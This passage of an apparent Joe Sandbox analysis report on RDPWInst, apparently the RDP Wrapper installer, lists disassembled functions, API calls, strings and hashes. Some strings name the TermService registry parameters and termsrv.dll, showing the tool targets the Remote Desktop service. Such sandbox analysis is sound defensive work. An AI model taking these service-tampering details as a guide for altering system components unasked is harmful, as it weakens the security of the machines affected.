                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionRaise$CriticalErrorLastLibrarySection$AddressAllocEnterFreeLeaveLoadLocalProc
                                                                                                              • String ID: $
                                                                                                              • API String ID: 4255670546-3993045852
                                                                                                              • Opcode ID: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                                                                              • Instruction ID: e7bef61209e92d946731ec4a4071e7a79c0b4aa0f4738c46576ebf8cfa3b661b
                                                                                                              • Opcode Fuzzy Hash: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                                                                              • Instruction Fuzzy Hash: EE618D7590070AAFDB21DFA5D885BAFB3B4AF48314F14803AE504B62D2D7789D44CB59
                                                                                                              Function 00403B64 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 277windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MessageBoxA.USER32(00000000,?,004026E0,00002010), ref: 00403F39
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message
                                                                                                              • String ID: $$zD$$zD$7$D&@$l&@$zPD$&@
                                                                                                              • API String ID: 2030045667-2939321579
                                                                                                              • Opcode ID: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                                                                              • Instruction ID: 997706f527e00cc568bc624ae0a330c29571725258f71f9dd8560831bc4d878f
                                                                                                              • Opcode Fuzzy Hash: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                                                                              • Instruction Fuzzy Hash: E5B1B434A042548FDB20DF2DC884B997BE8AB09745F1441FAE449F7382CB799E85CB59
                                                                                                              Function 00415198 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 203threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00415476,?,?,00000000,00000000), ref: 004151CE
                                                                                                                • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Locale$InfoThread
                                                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                              • API String ID: 4232894706-2493093252
                                                                                                              • Opcode ID: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                                                                              • Instruction ID: d9a4c13083f090c9220c38b115c8470d0dd0b24888f81dbd48f38483d2476b95
                                                                                                              • Opcode Fuzzy Hash: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                                                                              • Instruction Fuzzy Hash: C6717E34B005489BDB04EBA5C881BDF73A6DB88308F50843BB201EB39ADA3DDD95975C
                                                                                                              Function 0041983C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004198D5
                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004198F1
                                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041992A
                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004199A7
                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004199C0
                                                                                                              • VariantCopy.OLEAUT32(?), ref: 004199F5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                              • String ID:
                                                                                                              • API String ID: 351091851-3916222277
                                                                                                              • Opcode ID: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                                                                              • Instruction ID: 05f3e7187411a66581312748be8f4c599b64c7f757b61d9c7bcf5be2e84cfcbc
                                                                                                              • Opcode Fuzzy Hash: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                                                                              • Instruction Fuzzy Hash: BB510E75A1061D9BCB62DB59CC91AD9B3BCAF0C314F0041DAE509D7311DA389FC18F69
                                                                                                              Function 00406190 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                              • GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00406208
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileHandleWrite$Message
                                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                                              • API String ID: 1570097196-2970929446
                                                                                                              • Opcode ID: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                                                                              • Instruction ID: 3d9f27a079d1a1e85d20769b70378e11af8d5357eb747b9bac5a8d01f7cd0a80
                                                                                                              • Opcode Fuzzy Hash: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                                                                              • Instruction Fuzzy Hash: F8F09064688700B9FA1077A09D8BF5A264C5741F18F648A7FBA107C0E3C7FC44C5D66E
                                                                                                              Function 00403220 Relevance: 10.9, APIs: 7, Instructions: 407COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                                                                              • Instruction ID: cdb4153b94d32a19bbaa749183bbd41ea1cad44ce1b02117721c392bcbf59f8f
                                                                                                              • Opcode Fuzzy Hash: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                                                                              • Instruction Fuzzy Hash: AAC149627046001BE715AE7D9EC936E77899BC5326F18827FE504EB3C5DABCCE468348
                                                                                                              Function 00408D70 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71stringlibraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 00408D8D
                                                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 00408DA4
                                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 00408DD4
                                                                                                              • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 00408E43
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: lstrcpyn$AddressHandleModuleProc
                                                                                                              • String ID: GetLongPathNameW$kernel32.dll
                                                                                                              • API String ID: 682285877-568771998
                                                                                                              • Opcode ID: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                                                                              • Instruction ID: bfed53c75bae09f5f3cffe8e2e1a10a808aab42f40121fe7fe66bb66f29727bd
                                                                                                              • Opcode Fuzzy Hash: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                                                                              • Instruction Fuzzy Hash: 65213E71D10219EBDB10DBE8CA85A9EB3F9AF04344F14457BA584F72C1EB789E408B99
                                                                                                              Function 0043C9B4 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,00447324,?,?,00443D51,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043CA09
                                                                                                              Strings
                                                                                                              • $sD, xrefs: 0043CA16
                                                                                                              • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C9F8
                                                                                                              • [-] OpenKey error (code , xrefs: 0043CA1B
                                                                                                              • %SystemRoot%\System32\termsrv.dll, xrefs: 0043CA53
                                                                                                              • ServiceDll, xrefs: 0043CA58
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast
                                                                                                              • String ID: $sD$%SystemRoot%\System32\termsrv.dll$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters
                                                                                                              • API String ID: 1452528299-1418523706
                                                                                                              • Opcode ID: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                                                                              • Instruction ID: 567d776bcdb317a1c07dce30fb64d79162ce412928a02d635409720c7dced6b6
                                                                                                              • Opcode Fuzzy Hash: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                                                                              • Instruction Fuzzy Hash: 5E1160746042049FD700FBAAED8355AB7A5DB89318F21A07FF504AB652CA396D01972D
                                                                                                              Function 0043B48C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52serviceCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleService
                                                                                                              • String ID: error (code $$sD$[-]
                                                                                                              • API String ID: 1725840886-1845222458
                                                                                                              • Opcode ID: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                                                                              • Instruction ID: e4f6fbb8d87d745fddbbf3aa76ef7c2d42e102f771b0e90c1d198fe2bf5ce7b8
                                                                                                              • Opcode Fuzzy Hash: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                                                                              • Instruction Fuzzy Hash: 411165B4604204AFD700FBA5C946A5EBBE9EF8C309F51807AF504DB652C738AE409A6D
                                                                                                              Function 0041EFE0 Relevance: 7.8, APIs: 5, Instructions: 334COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                                                                              • Instruction ID: 2dafaf7b7fd63d2285bbc883fb865dc5d4a09b7d21a303d5748d7aa51e2b097e
                                                                                                              • Opcode Fuzzy Hash: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                                                                              • Instruction Fuzzy Hash: 33D18035E042599BCF10DBA9C4818FEB7B9EF49704B5080B7EC51A7251D738AD8BCB29
                                                                                                              Function 0042E0CC Relevance: 7.6, APIs: 5, Instructions: 142COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E12C
                                                                                                              • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1D4
                                                                                                              • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1F9
                                                                                                              • CharNextW.USER32(00000000,?,?,00000000,0042E26E), ref: 0042E211
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CharNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 3213498283-0
                                                                                                              • Opcode ID: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                                                                              • Instruction ID: 1814d07402b1a7f57a8d7a3fe8506fdc05c33e5c0032e5bf9772b1ea290cc636
                                                                                                              • Opcode Fuzzy Hash: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                                                                              • Instruction Fuzzy Hash: D5516D30B00624DFDF15EF6AD890A697BB5EF06304F8100E6E401DB3A5D778AD92CB5A
                                                                                                              Function 00412EDC Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,00412F73,?,?,00000000), ref: 00412EF4
                                                                                                                • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F24
                                                                                                              • EnumCalendarInfoW.KERNEL32(Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F2F
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F4D
                                                                                                              • EnumCalendarInfoW.KERNEL32(Function_00012E64,00000000,00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F58
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                                                                              • String ID:
                                                                                                              • API String ID: 4102113445-0
                                                                                                              • Opcode ID: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                                                                              • Instruction ID: 92d88662b64aaf91616c62fb6041fad244e46e3b41fee23c13374d6d2d88cd2b
                                                                                                              • Opcode Fuzzy Hash: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                                                                              • Instruction Fuzzy Hash: 930142713007046BE301A6B1CE13F9A726CEB82718F610437F100F66C1D6BCAE2192AD
                                                                                                              Function 00412F90 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,004131C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412FCB
                                                                                                                • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Locale$InfoThread
                                                                                                              • String ID: eeee$ggg$yyyy
                                                                                                              • API String ID: 4232894706-1253427255
                                                                                                              • Opcode ID: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                                                                              • Instruction ID: b43ca61d4524358572b11bc7e7a437c5213401559800a2754e6fdc13831cf262
                                                                                                              • Opcode Fuzzy Hash: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                                                                              • Instruction Fuzzy Hash: 97519835B00105ABDB10EF69C8425DEB7B5EF84305B21807BA401E73AADB7CDF92965D
                                                                                                              Function 00412D02 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
